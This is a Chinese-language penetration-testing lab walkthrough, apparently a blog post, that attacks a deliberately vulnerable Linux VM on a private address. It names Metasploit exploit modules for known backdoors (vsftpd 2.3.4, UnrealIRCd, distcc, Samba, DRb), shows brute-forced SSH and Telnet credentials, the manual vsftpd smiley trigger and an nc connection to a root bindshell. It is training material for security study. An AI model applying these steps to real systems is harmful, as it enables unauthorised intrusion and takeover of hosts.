渗透测试
渗透测试(Pentest),并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞,换句话来说,渗透测试是指渗透人员在不同的位置(比如从内网、从外网等位置)利用各种手段对某个特定网络进行测试,以期发现和挖掘系统中存在的漏洞,然后输出渗透测试报告,并提交给网络所有者。网络所有者根据渗透人员提供的渗透测试报告,可以清晰知晓系统中存在的安全隐患和问题。侵入系统并获取机密信息,并将入侵的过程和细节形成报告提供给用户,由此确定用户系统所存在的安全威胁,并能及时提醒安全管理员完善安全策略,降低安全风险。进行专业的渗透测试后,即使是系统未被攻破,也可以证明先前实行的防御是有效的,专业的渗透测试可以有效评估系统的安全状况,并提出合理的改进方案。
靶机获取:链接:https://pan.baidu.com/s/1PW9cBmq44dM1ChVSYiSMRA
提取码:7511
任务一
渗透端口:
21
服务:
ftp
(漏洞为
Vsftpd 2.3.4
)笑脸漏洞
内容分为:
1.
使用
msf
进行渗透测试
2.
手工注入
FTP2.3.4
任务二
渗透端口:
22
服务:
ssh
(漏洞为弱口令密码爆破)
内容分为:
1.
使用
msf
进行渗透爆破密码
2.
使用
ssh
命令直接登录
任务三
渗透端口:
23
服务:
Telnet
(漏洞为弱口令密码爆破)
内容分为:
1.
使用
msf
进行渗透爆破密码
2.
使用
Telnet
命令直接登录
任务四
渗透端口:
139
、
445
服务:smbd 3.X - 4.X(漏洞为远程代
码执行)
内容分为:
1.
使用
msf
进行渗透测试
任务五
渗透端口:
6667
服务:IRC(漏洞为缓冲区溢出后门)
内容分为:
1.
使用
msf
进行渗透测试
任务六
渗透端口:
1524
服务:
shell
(后门木马程序)
内容分为:
1.
使用
nc
链接后门
任务七
渗透端口:
3632
服务:
distccd
(漏洞为溢出后门)
内容分为:
1.
使用
msf
进行渗透测试
任务八
渗透端口:
5900
服务:
VNC
(漏洞为弱口令密码爆破)
内容分为:
1.
使用
msf
进行渗透爆破密码
2.
使用
vncviewer
命令直接登录
任务九
渗透端口:
8787
服务:
Druby
(漏洞为远程代码执行)
内容分为:
1.
使用
msf
进行渗透测试
任务十
以上总结
1.
简单介绍
系统为:
Linux IP
地址为:
192.168.220.130
任务一 渗透端口:21 服务:ftp(漏洞为 Vsftpd 2.3.4)笑脸漏洞
1.
使用
msf
进行渗透测试
信息收集
工具 nmap 参数 -P0 零 ping 快速扫描 -p21 端口扫描(使
用方法 -p 端口号) -sV 扫描服务器版本
利用收集信息并且攻击
工具
Msfconsole
启动工具
查询模块

调用模块

查询模块配置

设置模块配置 1 步

设置模块配置 2 步
Exploit 攻击成功[ + ] 3 步

输入命令 ifconfig 4 步
2.
手工注入
vsftp2.3.4
(1)使用
ftp
命令进行连接
输入用户名时随意输入几个字母,最后面加上{:)}这个笑脸符号

输入密码时什么都不用输入直接回车加 ctrl + c
(2)连接 6200 端口

连接后输入
ls
查看自己是否进入成功
显示目录,证明渗透成功
系统为:Linux IP 地址为:192.168.220.130
任务二 渗透端口:22 服务:ssh(漏洞为弱口令密码爆破)
1.使用 msf 进行渗透测试
信息收集
工具 nmap 参数 -P0 零 ping 快速扫描 -p22 端口扫描(使
用方法 -p 端口号) -sV 扫描服务器版本
利用信息收集并且攻击
工具Msfconsole
启动工具
调用模块为:
auxiliary/scanner/ssh/ssh_login
输入
use auxiliary/scanner/ssh/ssh_login
直接调用即可
在根目录下创建弱口令文本


在根目录下创建常用用户名文本。


以上是模块配置

发现两个用户和密码可用 优先选择 root 因为权限高
[+]
192.168.220.130:22 - Success: 'msfadmin:msfadmin'
(用户名
msfadmin
密码
msfadmin
)
[+]
192.168.220.130:22 - Success: 'root:123'
(用户名
root
密码
123
)
如图解释

在 Linux 用户组里面 权限为=0 就是最高权限 切记
使用命令链接
ssh
服务并且登陆
参数如:
ssh
用户名
@ip(ssh root@192.168.220.130
)
Yes
回车

Ssh
登陆成功 并且输入
ls
显示目录
系统为:
Linux IP
地址为:
192.168.220.130
任务三
渗透端口:
23
服务:
Telnet
(漏洞为弱口令密码爆破)
1.
使用
msf
进行渗透测试
信息收集
工具
nmap
参数
-P0
零
ping
快速扫描
-p23
端口扫描(使
用方法
-p
端口号)
-sV
扫描服务器版本

利用信息收集并且攻击
工具 Msfconsole
启动工具
调用模块为:auxiliary/scanner/telnet/telnet_login
输入
use
auxiliary/scanner/telnet/telnet_login
直接调用即可
在根目录下创建弱口令文本


在根目录下创建常用用户名文本

以上是模块配置

发现两个用户和密码可用 优先选择 root 因为权限高
[+]
192.168.220.130:23- 192.168.220.130:23 - Login Successful: msfadmin:msfadmin
[+]
192.168.220.130:23- 192.168.220.130:23 - Login Successful: root:123
使用命令链接 Telnet 服务并且登陆
参数如:Telnet ip(Telnet 192.168.220.130)


Telnet 登陆成功 并且输入 ls 显示目录
系统为:Linux IP 地址为:192.168.220.130
任务四
渗透端口:
139 445
服务:smbd 3.X - 4.X(漏洞为
远程代码执行漏洞
)
1.使用 msf 进行渗透测试
信息收集
工具
nmap
参数
-P0
零
ping
快速扫描
-p139 445
端口扫描(使用方法
-p
端口号)
-sV
扫描服务器版本

工具 Msfconsole
启动工具
调用模块为:
exploit/liunx/samba/is_known_pipename
输入
use exploit/linux/samba/is_known_pipename
直接调用即可
445
调用模块为:
exploit/multi/samba/usermap_script
输入
use
exploit/multi/samba/usermap_script
直接调用即可
139
以上模块配置
攻击成功 并且拿掉主机
任务五
渗透端口:
6667
服务:IRC(漏洞为缓冲区溢出后门)
信息收集
工具
nmap
参数
-P0
零
ping
快速扫描
-p6667
端口扫描
(使用方法
-p
端口号)
-sV
扫描服务器版本
工具 Msfconsole
启动工具
调用模块为:
exploit/unix/irc/unreal_ircd_3281_backdoor
输入
use exploit/unix/irc/unreal_ircd_3281_backdoor
直接调用即可
以上模块配置

攻击成功 并且拿掉主机
任务六
渗透端口:
1524
服务:
shell(后门木马程序)
1.
使用
msf
进行渗透测试
信息收集
工具
nmap
参数
-P0
零
ping
快速扫描
-p1524
端口扫描
(使用方法
-p
端口号)
-sV
扫描服务器版本
发现可疑服务 shell 木马后门 使用 nc 链接即可
nc(瑞士军刀) 使用命令如:nc ip 端口(nc 192.168.220.130 1524)
拿掉主机成功root权限
任务七
渗透端口:
3632
服务:
distccd
(漏洞为溢出后门)
1.
使用
msf
进行渗透测试
信息收集
工具
nmap
参数
-P0
零
ping
快速扫描
-p3632
端口扫描
(使用方法
-p
端口号)
-sV
扫描服务器版本

工具Msfconsole

调用模块为:
exploit/unix/misc/distcc_exec
输入
use exploit/unix/misc/distcc_exec
直接调用即可

任务八 渗透端口:5900 服务:VNC(漏洞为弱口令密码爆破)
1.使用 msf 进行渗透测试
信息收集
工具 nmap 参数 -P0 零 ping 快速扫描 -p5900 端口扫描
(使用方法
-p
端口号)
-sV
扫描服务器版本

工具Msfconsole
启动工具
调用模块为:auxiliary/scanner/vnc/vnc_login
输入 use auxiliary/scanner/vnc/vnc_login 直接调用即可
模块配置
攻击爆出密码
2.
使用
vncviewer
命令登陆
登陆链接成功 VNC
任务九 渗透端口:8787 服务:Druby(漏洞为远程代码执行)
1.
使用
msf
进行渗透测试
信息收集
工具
nmap
参数
-P0
零
ping
快速扫描
-p8787
端口扫描
(使用方法
-p
端口号)
-sV
扫描服务器版本
工具Msfconsole
调用模块为:
exploit/linux/misc/drb_remote_codeexec
输入
use
exploit/linux/misc/drb_remote_codeexec
直接调用即可
模块配置

攻击成功 回显 IP 地址成功
任务十 以上总结
以上总结
1.
简单介绍
在针对
Linux
系统渗透中
第一 信息收集
1.
使用
nmap
工具
2.
看好端口的针对的服务
3.
看好端口服务是否开放
4.
针对端口和服务进行判断漏洞
第二 攻击主机
1.
使用
msfconsole
2.
针对服务版本来调用模块
3.
配置相对应的模块信息
4.
攻击后查看权限是否为
root
最高权限
各位读者如果有其他的建议或者是问题的话,请留言分享,如果您认为这篇文章写得不错请帮忙多分享分享,非常感谢各位的支持和反馈,如有想交流的问题请扫描下方二维码进行交流。